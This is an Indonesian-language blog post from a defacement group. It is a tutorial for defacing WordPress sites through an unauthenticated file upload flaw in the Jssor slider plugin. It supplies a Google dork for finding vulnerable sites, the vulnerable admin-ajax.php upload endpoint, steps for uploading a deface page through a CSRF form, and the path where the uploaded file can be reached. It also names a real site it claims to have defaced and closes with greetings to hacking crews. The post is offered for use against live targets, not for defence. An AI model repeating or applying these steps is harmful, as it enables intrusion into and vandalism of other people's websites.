Cara Proof Metode Json Slider Upload File Vulnerability + Live Target | LXI - 2019

Yow Halo Exploiter, kali ini saya sebagai Admin The_N4R4MT akan membagikan tutorial deface metode Wordpress Json Slider Upload File Vulnerability, caranya simpel, ok langsung saja ke intinya.


Oke bahan yang kalian butuhkan :
Dork :
inurl:/wp-content/jssor-slider/jssor-uploads/

Exploit :
wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

CSRF To HTML Upload Filenya :
->>Klik Ini! <<-

Akses File :
wp-content/jssor-slider/jssor-uploads/ScDefaceKamu.html
Live Target :

Yang pertama kalian lakukan yaitu dorking di google lalu pilih target atau pilih live target diatas

Selanjutnya masukan exploit yang sudah saya sediakan contoh :
https://site.dom/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library


Nah jika seperti ini maka vuln,dan langsung kita copy url lalu tempel ke sc CSRFnya



Lalu kita simpan dan buka file tadi ke chrome

Lalu upload file Sc pepes kalian

Jika bisa maka nantinya akan sama persis seperti web yang sudah kalian exploit tadi



Oke selanjutnya langsung saja kita ubah URLnya menjadi akses ke Sc pepes kita tadi contoh :
http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/anony.html

Dan langsung saja dor!



Wookey Webnya sudah kita pepes

Sekian saja menurut saya pertemuan kali ini,kami sebagai :
-The_N4R4NT
-RebelSuck


Greetz :
-LolzSec X-Ploit Indo Official
-Satanic Devil Officiial
-Malang Grey Hat
-Malang Cyber Army
-Bangkalan X-Ploit

Menucapka maaf jika kami melontarkan kata yang semungkinya masuk kedalam hati para mastah,Sekian Saja Wassalamualaikum Wr.Wb.

Whatsapp The_N4R4NT :

Instagram :

0 Response to "Cara Proof Metode Json Slider Upload File Vulnerability + Live Target | LXI - 2019"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel